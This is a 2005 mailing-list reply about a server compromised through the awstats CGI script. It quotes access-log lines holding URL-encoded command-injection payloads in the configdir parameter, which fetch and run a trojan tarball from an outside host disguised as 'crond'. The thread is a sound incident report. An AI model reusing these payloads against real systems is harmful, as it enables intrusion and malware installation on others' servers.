Am Fr, den 04.03.2005 schrieb Chris Strzelczyk um 17:40: > I just though I would let you know how my server got compromised. This > even happend after I installed the new version of awstats on Wednesday. > So in short I don't know if it is OK to run awstats as a cgi executable. > > These are from my access log: > > "GET > /cgi-bin/awstats.pl? > configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2 > 0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta > r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec > ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-" > > "GET > /cgi-bin/awstats.pl? > configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidi > lis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20 > psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b% > 2500 HTTP/1.1" 200 634 "-" "-" > > > -cs Thank you for this report. So you are saying that even with awstats 6.4 you got compromised as Apache did execute the logged command and a trojan then started running located in /tmp? If so, would you please be so kind and report that issue to the awstats project guys as soon as possible? Alexander -- Alexander Dalloz | Enger, Germany | GPG http://pgp.mit.edu 0xB366A773 legal statement: http://www.uni-x.org/legal.html Fedora Core 2 GNU/Linux on Athlon with kernel 2.6.10-1.14_FC2smp Serendipity 18:32:39 up 11 days, 5:41, load average: 0.20, 0.17, 0.25
Attachment:
signature.asc
Description: Dies ist ein digital signierter Nachrichtenteil
